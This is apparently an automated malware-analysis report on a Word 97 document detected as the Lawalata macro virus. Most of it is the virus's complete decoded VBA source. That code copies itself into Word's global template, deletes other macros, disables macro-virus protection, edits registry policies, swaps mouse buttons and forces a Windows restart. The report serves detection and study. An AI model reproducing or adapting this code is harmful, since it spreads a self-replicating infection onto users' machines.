Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6d5fbdef24cc465e…

MALICIOUS

Office (OLE)

75.5 KB Created: 1980-01-11 07:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 040e7d410573c474d1cdd634d9401fc7 SHA-1: 716128317fc04bd4b1dc1e89147ac688f041f266 SHA-256: 6d5fbdef24cc465e0f79f4a72ff1c45ac127e8050dc46f9397ae3e728de7274a
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Lawalata-1' and 'Win.Trojan.C-286'. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close functions, indicating an attempt to execute malicious code upon opening or closing the document. The VBA script 'macros.bas' contains comments referencing 'virus' and 'LUMLAWALATA', and includes API calls for user32.dll, suggesting it attempts to manipulate the system or download additional payloads.

Heuristics 6

  • ClamAV: Doc.Trojan.Lawalata-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lawalata-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    AutoOpen
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 47442 bytes
SHA-256: 97a3ee526bf243c93b80169a1b6eae08ba4ac5f19b0bf5d58b453eaec68d2844
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lawalata"
'Hi World.....
'It's my virus for you !
'My Name is LUMLAWALATA
'Thank's
'==================================
'I'm a friendly Virus always try say....
'Pray...pray....and... PRAY !!!
'I Love ISLAM !!





















Private Declare Function SwapMouseButton Lib "user32" (ByValbSwap As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwReserved As Long, ByVal uRreturnCode As Long) As Long

Public AD As Object, aDes As Variant
Public NonLUMLAWALATA As Boolean, afound As Boolean, hapus As Boolean, reset As Boolean, aExc As Boolean, DocCount As Boolean
Function LumMaster()
Dim nmak(1) As String
Dim NT As Object
Dim aSrc$
On Error GoTo selesai
nmak(0) = "lawalata"
nmak(1) = "LUMLAWALATA"

aSrc = MacroContainer
Set NT = NormalTemplate
If Not DocCount Then
Set AD = ActiveDocument
ElseIf aSrc <> "LumNrml.dot" Then
aSrc = NT
End If

If aSrc = NT Then
aSrc = NT.FullName: Set aDes = AD
ElseIf aSrc = AD Then
aSrc = AD.FullName: Set aDes = NT
ElseIf aSrc = "LumNrml.dot" Then
Set aDes = NT
aSrc = Options.DefaultFilePath(8) & "\LumNrml.src"
End If

Mhapus aDes
With aDes.VBProject
If Not (Not hapus And .Description = "lawalata" And .VBComponents.Count > 2) Then
    Mcopy aSrc, aDes, nmak
    hapus = False
    .Description = "lawalata"
    If aDes = NT Then
        Options.SaveInterval = 1
        CustomizationContext = NT
        CommandBars("Tools").reset
        KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
        Command:="ToolsRecordMacroStart"
        aDes.Save
    End If
    CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Aksi
End If
End With
If afound = True Then Exit Function
Refresh
On Error Resume Next
Aksi:
If aExc = True Then Exit Function
Exit Function
selesai:
If Err.Number = 50289 Then MsgBox "Terimakasih Anda Telah" & Chr(13) & "Memproteksi Word dengan Aman", vbInformation, "LUMLAWALATA"
End Function

Sub Mhapus(Sfile)
Dim nmak As Object
For Each nmak In Sfile.VBProject.VBComponents
    If nmak.Name = "NewMacros" Then NonLUMLAWALATA = True
    If nmak.Name <> "ThisDocument" And nmak.Name <> "NewMacros" _
    And nmak.Name <> "lawalata" And nmak.Name <> "LUMLAWALATA" Then
        hapus = True
        If reset Then
        Application.OrganizerDelete Sfile.FullName, nmak.Name, 3
        Else
        nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
        End If
    End If
Next nmak
End Sub
Sub Mcopy(Sfile, Dfile, nmak)
Dim aNmak
For Each aNmak In nmak
Application.OrganizerCopy Sfile, Dfile.FullName, aNmak, 3
Next
End Sub
Sub Action()
Documents.Add
On Error Resume Next
With ActiveWindow
.Caption = "LUMLAWALATA"
.ActivePane.View.Zoom.Percentage = 100
.View.FullScreen = Not .View.FullScreen
.DisplayRulers = False
.DisplayHorizontalScrollBar = False
.DisplayVerticalRuler = False
.DisplayVerticalScrollBar = False
.View.ShowTextBoundaries = False
    CommandBars("Full Screen").Position = 1
    With CommandBars("Full Screen").Controls(1)
    .Caption = "LUMLAWALATA," & "  " & Date
    .Style = 3
    .FaceId = 281
    End With
.View.Type = 6
Randomize
With ActiveDocument.Background.Fill
    .Visible = True
    .PresetGradient Int((6 - 1 + 1) * Rnd + 1), 1, Int((24 - 1 + 1) * Rnd + 1)
End With
LUMLAWALATA.Show
.View.FullScreen = Not .View.FullScreen
End With
CommandBars("Full Screen").reset
WBT
ActiveDocument.Close 0
WBF
End Sub
Sub FileOpen()
WBT
If Dialogs(80).Show <> 0 Then
WBF
AutoOpen
Else
WBF
End If
End Sub
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
LumMaster
If Documents.Count > 1 Then
    For i = 1 To Documents.Count
    If Documents(i).Name <> ActiveDocument.Name Then
    Set AD = Documents(i)
    DocCount = True
    hapus = False
    LumMaster
    End If
    Next
End If
If Now > DateSerial(1998, 12, 12) Then Application.OnTime When:=Now + TimeValue("00:45:00"), Name:="lawalata.Action"
End
End Sub
Sub ViewVbCode()
If MsgBox("Maaf.." & Chr(13) & "Anda jangan coba-coba mengedit, merubah, ataupun menghapus makro LUMLAWALATA..!!" & Chr(13) & Chr(13) _
& "Anda hanya bisa merekam makro, menyimpan, menggunakan" & Chr(13) & "serta menghapus makro buatan Anda" & Chr(13) & Chr(13) & " Apakah Anda ingin merekam makro..?", vbExclamation + vbYesNo, "LUMLAWALATA") _
= vbYes Then Send
Keys "%m%s{down}~%d'Macro non-LUMLAWALATA'%m"
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
aExc = True
LumMaster
WBT
AddIns.Unload False
WBF
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub AutoExit()
Dim aAddin As Object
On Error GoTo batal
WBT
If Documents.Count <> 0 Then Documents.Close
Options.DefaultFilePath(2) = Options.DefaultFilePath(6)
afound = True
For Each aAddin In AddIns
    If aAddin.Name = "LumNrml.dot" Then afound = False
Next aAddin
        
If afound = True Then
Application.Visible = False
Documents.Add
LumMaster
    With ActiveDocument
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\LumNrml.src", FileFormat:=wdFormatDocument, AddToRecentFiles:=False
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\LumNrml.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False
    End With
End If
Application.Quit
batal:
WBF
End Sub
Sub ToolsMacro()
WBF
On Error GoTo batal
Mhapus ActiveDocument
If NonLUMLAWALATA Then
    If MacroContainer = ActiveDocument Then Application.Run NormalTemplate.VBProject.Name & ".lawalata.ToolsMacro": Exit Sub
    Application.DisplayAlerts = 0
        With Dialogs(215)
        .Description = "Macros LUMLAWALATA mungkin tidak bisa Anda hapus, Anda hanya bisa menghapus makro buatan Anda (Descr: 'Makro non-LUMLAWALATA')"
        If .Display = 1 Then .Execute
        End With
    Application.DisplayAlerts = -1
Else
ViewVbCode
End If
batal:
End Sub
Sub FileTemplates()
WBF
If Not reset Then Dialogs(87).Display
End Sub
Sub FormatStyle()
WBF
Dialogs(180).Show
End Sub
Function Refresh()
reset = True
FileTemplates
Mhapus aDes
End Function
Sub AutoClose()
Application.DisplayAlerts = -1
With Options
.SaveNormalPrompt = False
.SaveInterval = 10
.VirusProtection = False
End With
If ActiveWindow.Caption <> "LUMLAWALATA" And InStr(1, ActiveDocument.Name, "Docume", 1) = 0 _
And ActiveDocument.Name <> "LumNrml.dot" Then LumMaster
End Sub
Sub FileExit()
   AutoExit
End Sub
Sub ToolsOptions()
   Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
   Dialogs(wdDialogToolsOptions).Show
   Options.DefaultFilePath(wdUserTemplatesPath) = Application.Path
End Sub
Function WBT()
   WordBasic.disableautomacros True
End Function
Function WBF()
   WordBasic.disableautomacros False
End Function
Sub Kaspo()
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun") = 1
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = 1
   System.PrivateProfileString("", "HKEY_LOCAL_MACINE\SOFTAWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "ISLAM"
   System.PrivateProfileString("", "HKEY_LOCAL_MACINE\SOFTAWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "The Power of The World"
End Sub
Sub GantiMouse()
On Error GoTo MouseCrash
SwapMouseButton &H4
MouseCrash:
End Sub

Sub RestartWin()
On Error GoTo RestartErr
ExitWindowsEx &H2, &HFFFFFFFF
RestartErr:
End Sub

Sub TulisTeks()
On Error GoTo TulisErr
   Call barisakhir
   Selection.TypeParagraph
   Selection.Font.Bold = True
   Selection.TypeText ("Maaf jika tulisan kecil ini mengganggu kerja Anda !")
   Selection.TypeParagraph
   Selection.TypeText ("Saya hanya mengingatkan Anda untuk tidak terlalu tegang dalam bekerja")
   Selection.TypeParagraph
   Selection.TypeText ("Gunakan waktu Anda selain untuk bekerja juga untuk beristirahat dengan nyaman")
   Selection.TypeParagraph
   Selection.TypeText ("Ingat !!! WAKTU adalah UANG")
   Selection.TypeParagraph
   Selection.TypeParagraph
   Selection.Font.Italic = True
   Selection.TypeText ("LUM LAWALATA")
TulisErr:
End Sub

Sub Tanya()
On Error GoTo TanyaErr
If System.Country = 62 Then
  takon = MsgBox("Anda suka Muslim ??!?!", vbYesNo, "Assalamu'alaikum..")
Else
  takon = MsgBox("Do you like MOSLEM ??!?!", vbYesNo, "Assalamu'alaikum..")
End If

If takon = vbYes Then
  If System.Country = 62 Then
    xx = MsgBox("Semoga Allah SWT selalu bersama Anda", , "LUMLAWALATA")
  Else
    xx = MsgBox("May ALLAH SWT BLESS YOU", , "LUMLAWALATA")
  End If
Else
  Kaspo
  GantiMouse
  RestartWin
End If
TanyaErr:
End Sub
Public Sub NoMacro()
End Sub
Function barisawal()
  Selection.GoTo What:=wdGotoEnd
  Selection.InsertBreak
End Function
Function barisakhir()
  Selection.GoTo What:=wdGoToLine, Which:=wdGoToRelative, Count:=90000000
  Selection.EndKey
End Function
Sub asal()
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun") = 0
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = 0
End Sub

Attribute VB_Name = "LUMLAWALATA"
Attribute VB_Base = "0{BF4F2BA2-4A67-11D3-ACD9-900936D3B526}{BF4F2B9C-4A67-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False








































'Dear you .....
'It's my virus for you !
'My Name is LUMLAWALATA
'Thank's
'==================================
'I'm a friendly Virus always try say....
'Pray...pray....and... PRAY !!!
'I Love ISLAM !!





















































Dim Teks(4) As String
Private Sub CommandButton1_Click()
Do
    With LUMLAWALATA
    .Height = .Height - 10
    .Width = .Width - 15
    If .Height < 25 Then Exit Do
    End With
    Beep
Loop
Unload Me
End Sub
Private Sub UserForm_Activate()
TT
End Sub
Sub TT()
Dim a As Byte, diam As Boolean
Dim tp&, tm!, sel!, i%
a = 1
diam = True
LUMLAWALATA.Enabled = False
Do
    DoEvents
    sel = Timer - tm
    tp = tp + 1
    If tp Mod 300 = 0 Then
    Label4.ForeColor = LUMLAWALATA.BackColor
    End If
    If tp Mod 600 = 0 Then
    Label4.ForeColor = &H80000009
End If
    If sel > 0.1 Then
        tm = Timer
        i = i + 1
        If a = 4 Then Label1.Font.Size = 16: Label1.Width = Image1.Width
        Label1.Caption = Label1.Caption & Mid(Teks(a), i, 1)
        If Mid(Teks(a), i, 1) Like "[! ]" Then Beep
            If Len(Label1.Caption) = Len(Teks(a)) Then
                If diam Then
                    Do
                    If Timer - tm > 1 Then Exit Do
                    DoEvents
                    Label4.ForeColor = LUMLAWALATA.BackColor
                    Loop
                    diam = False
                    If a = 4 Then GoTo catat
                End If
            Label2.Move Label2.Left - 9
            If Label2.Left <= Label1.Left Then GoSub catat
        End If
    End If
Loop
Exit Sub
catat:
If a <> 5 Then Label1.Caption = ""
tm = Timer
Label2.Left = Label1.Left + Label1.Width
a = a + 1
i = 0
diam = True
        If a = 5 Then
            Label4.Visible = False
            Frame1.Visible = True
            Image1.Visible = True
            LUMLAWALATA.Enabled = True
            CommandButton1.SetFocus
            Image1.Picture = LoadPicture(System.PrivateProfileString("", _
            "HKEY_CURRENT_USER\Control Panel\desktop", "Wallpaper"))
            Exit Sub
        End If
Return
End Sub
Private Sub UserForm_Layout()
Dim waktu%, shalat$
waktu = Val(Format(Time, "hh"))
Select Case waktu
Case 12 To 14
shalat = "DZUHUR"
Case 15 To 17
shalat = "ASHAR"
Case 18 To 18
shalat = "MAGHRIB"
Case 19 To 23
shalat = "ISYA"
Case 0 To 2
shalat = "ISYA"
Case 5 To 5
shalat = "SUBUH"
Case Else
Label4.Visible = False
End Select
If System.Country = 62 Then
   Teks(1) = "Maaf !! Mungkin kehadiran LUMLAWALATA mengganggu kesibukan Anda, untuk itu sekali lagi maafkanlah kelancangan LUMLAWALATA .."
   Teks(2) = "Ingat...!! Kerja boleh tapi ingat istirahatlah sejenak biar enggak stres, pusing, uring-uringan, dsb..!"
   Teks(3) = "Untuk itu... istirahatlah yang cukup, hanya itu yang LUMLAWALATA sampaikan !"
   Teks(4) = "SHOLATlah sebelum di SHOLATkan"
   Label2.Left = Label1.Left + Label1.Width
   Label3.Caption = "By :" & Chr(13) & "LUM LAWALATA '98" & Chr(13) & Chr(13) & "Thanks to : " & Chr(13) & Application.UserName
   Label4.Caption = "Apakah Anda sudah sholat " & shalat & "!"
Else
   Teks(1) = "So sorry ...!! I visit your PC without ...???"
   Teks(2) = "Remember!! The MOSLEM POWER is NEVER DIE !"
   Teks(3) = "I Suggest you to ....."
   Teks(4) = "Toreh..toreh.. Mon e' angguy komputer paneka ! On laon bein Cong !"
   Label2.Left = Label1.Left + Label1.Width
   Label3.Caption = "By :" & Chr(13) & "LUM LAWALATA '98" & Chr(13) & Chr(13) & "Thanks to : " & Chr(13) & Application.UserName
   Label4.Caption = "Have the " & shalat & " Pray ?!"
End If
End Sub
Private Sub UserForm_Terminate()
    Dim i As Integer
    For i = 1 To 100
        Beep
    Next
End Sub

' Processing file: /tmp/qstore_mw0akg_n
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/lawalata - 18493 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000D "Hi World....."
' Line #1:
' 	QuoteRem 0x0000 0x0017 "It's my virus for you !"
' Line #2:
' 	QuoteRem 0x0000 0x0016 "My Name is LUMLAWALATA"
' Line #3:
' 	QuoteRem 0x0000 0x0007 "Thank's"
' Line #4:
' 	QuoteRem 0x0000 0x0022 "=================================="
' Line #5:
' 	QuoteRem 0x0000 0x0027 "I'm a friendly Virus always try say...."
' Line #6:
' 	QuoteRem 0x0000 0x001E "Pray...pray....and... PRAY !!!"
' Line #7:
' 	QuoteRem 0x0000 0x000F "I Love ISLAM !!"
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' 	FuncDefn (Private Declare Function SwapMouseButton Lib "user32" (ByValbSwap As Long) As Long)
' Line #30:
' 	FuncDefn (Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwReserved As Long, ByVal uRreturnCode As Long) As Long)
' Line #31:
' Line #32:
' 	Dim (Public) 
' 	VarDefn AD (As Object)
' 	VarDefn aDes (As Variant)
' Line #33:
' 	Dim (Public) 
' 	VarDefn NonLUMLAWALATA (As Boolean)
' 	VarDefn afound (As Boolean)
' 	VarDefn hapus (As Boolean)
' 	VarDefn reset (As Boolean)
' 	VarDefn aExc (As Boolean)
' 	VarDefn DocCount (As Boolean)
' Line #34:
' 	FuncDefn (Function LumMaster())
' Line #35:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0001 
' 	VarDefn nmak (As String)
' Line #36:
' 	Dim 
' 	VarDefn NT (As Object)
' Line #37:
' 	Dim 
' 	VarDefn aSrc
' Line #38:
' 	OnError selesai 
' Line #39:
' 	LitStr 0x0008 "lawalata"
' 	LitDI2 0x0000 
' 	ArgsSt nmak 0x0001 
' Line #40:
' 	LitStr 0x000B "LUMLAWALATA"
' 	LitDI2 0x0001 
' 	ArgsSt nmak 0x0001 
' Line #41:
' Line #42:
' 	Ld MacroContainer 
' 	St aSrc 
' Line #43:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set NT 
' Line #44:
' 	Ld DocCount 
' 	Not 
' 	IfBlock 
' Line #45:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #46:
' 	Ld aSrc 
' 	LitStr 0x000B "LumNrml.dot"
' 	Ne 
' 	ElseIfBlock 
' Line #47:
' 	Ld NT 
' 	St aSrc 
' Line #48:
' 	EndIfBlock 
' Line #49:
' Line #50:
' 	Ld aSrc 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #51:
' 	Ld NT 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld AD 
' 	Set aDes 
' Line #52:
' 	Ld aSrc 
' 	Ld AD 
' 	Eq 
' 	ElseIfBlock 
' Line #53:
' 	Ld AD 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #54:
' 	Ld aSrc 
' 	LitStr 0x000B "LumNrml.dot"
' 	Eq 
' 	ElseIfBlock 
' Line #55:
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #56:
' 	LitDI2 0x0008 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	LitStr 0x000C "\LumNrml.src"
' 	Concat 
' 	St aSrc 
' Line #57:
' 	EndIfBlock 
' Line #58:
' Line #59:
' 	Ld aDes 
' 	ArgsCall Mhapus 0x0001 
' Line #60:
' 	StartWithExpr 
' 	Ld aDes 
' 	MemLd VBProject 
' 	With 
' Line #61:
' 	Ld hapus 
' 	Not 
' 	MemLdWith Description 
' 	LitStr 0x0008 "lawalata"
' 	Eq 
' 	And 
' 	MemLdWith VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0002 
' 	Gt 
' 	And 
' 	Paren 
' 	Not 
' 	IfBlock 
' Line #62:
' 	Ld aSrc 
' 	Ld aDes 
' 	Ld nmak 
' 	ArgsCall Mcopy 0x0003 
' Line #63:
' 	LitVarSpecial (False)
' 	St hapus 
' Line #64:
' 	LitStr 0x0008 "lawalata"
' 	MemStWith Description 
' Line #65:
' 	Ld aDes 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #66:
' 	LitDI2 0x0001 
' 	Ld Options 
' 	MemSt SaveInterval 
' Line #67:
' 	Ld NT 
' 	St CustomizationContext 
' Line #68:
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemCall reset 0x0000 
' Line #69:
' 	LineCont 0x0004 10 00 08 00
' 	LitDI2 0x004D 
' 	LitDI2 0x0400 
' 	ArgsLd BuildKeyCode 0x0002 
' 	ParamNamed KeyCode 
' 	LitDI2 0x0001 
' 	ParamNamed KeyCategory 
' 	LitStr 0x0015 "ToolsRecordMacroStart"
' 	ParamNamed Command 
' 	Ld KeyBindings 
' 	ArgsMemCall Add 0x0003 
' Line #70:
' 	Ld aDes 
' 	ArgsMemCall Save 0x0000 
' Line #71:
' 	EndIfBlock 
' Line #72:
' 	LitStr 0x000A "ViewVbCode"
' 	LitDI2 0x0002 
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt OnAction 
' Line #73:
' 	ElseBlock 
' Line #74:
' 	GoTo Aksi 
' Line #75:
' 	EndIfBlock 
' Line #76:
' 	EndWith 
' Line #77:
' 	Ld afound 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #78:
' 	ArgsCall Refresh 0x0000 
' Line #79:
' 	OnError (Resume Next) 
' Line #80:
' 	Label Aksi 
' Line #81:
' 	Ld aExc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #82:
' 	ExitFunc 
' Line #83:
' 	Label selesai 
' Line #84:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI4 0xC471 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0016 "Terimakasih Anda Telah"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001C "Memproteksi Word dengan Aman"
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x000B "LUMLAWALATA"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #85:
' 	EndFunc 
' Line #86:
' Line #87:
' 	FuncDefn (Sub Mhapus(Sfile))
' Line #88:
' 	Dim 
' 	VarDefn nmak (As Object)
' Line #89:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	Ld Sfile 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #90:
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NonLUMLAWALATA 
' 	EndIf 
' Line #91:
' 	LineCont 0x0004 0C 00 04 00
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0008 "lawalata"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x000B "LUMLAWALATA"
' 	Ne 
' 	And 
' 	IfBlock 
' Line #92:
' 	LitVarSpecial (True)
' 	St hapus 
' Line #93:
' 	Ld reset 
' 	IfBlock 
' Line #94:
' 	Ld Sfile 
' 	MemLd FullName 
' 	Ld nmak 
' 	MemLd New 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #95:
' 	ElseBlock 
' Line #96:
' 	LitDI2 0x0001 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #97:
' 	EndIfBlock 
' Line #98:
' 	EndIfBlock 
' Line #99:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	NextVar 
' Line #100:
' 	EndSub 
' Line #101:
' 	FuncDefn (Sub Mcopy(Sfile, Dfile, nmak))
' Line #102:
' 	Dim 
' 	VarDefn aNmak
' Line #103:
' 	StartForVariable 
' 	Ld aNmak 
' 	EndForVariable 
' 	Ld nmak 
' 	ForEach 
' Line #104:
' 	Ld Sfile 
' 	Ld Dfile 
' 	MemLd FullName 
' 	Ld aNmak 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #105:
' 	StartForVariable 
' 	Next 
' Line #106:
' 	EndSub 
' Line #107:
' 	FuncDefn (Sub Action())
' Line #108:
' 	Ld Documents 
' 	ArgsMemCall Add 0x0000 
' Line #109:
' 	OnError (Resume Next) 
' Line #110:
' 	StartWithExpr 
' 	Ld ActiveWindow 
' 	With 
' Line #111:
' 	LitStr 0x000B "LUMLAWALATA"
' 	MemStWith Caption 
' Line #112:
' 	LitDI2 0x0064 
' 	MemLdWith ActivePane 
' 	MemLd View 
' 	MemLd Zoom 
' 	MemSt Percentage 
' Line #113:
' 	MemLdWith View 
' 	MemLd FullScreen 
' 	Not 
' 	MemLdWith View 
' 	MemSt FullScreen 
' Line #114:
' 	LitVarSpecial (False)
' 	MemStWith DisplayRulers 
' Line #115:
' 	LitVarSpecial (False)
' 	MemStWith DisplayHorizontalScrollBar 
' Line #116:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalRuler 
' Line #117:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalScrollBar 
' Line #118:
' 	LitVarSpecial (False)
' 	MemLdWith View 
' 	MemSt ShowTextBoundaries 
' Line #119:
' 	LitDI2 0x0001 
' 	LitStr 0x000B "Full Screen"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Position 
…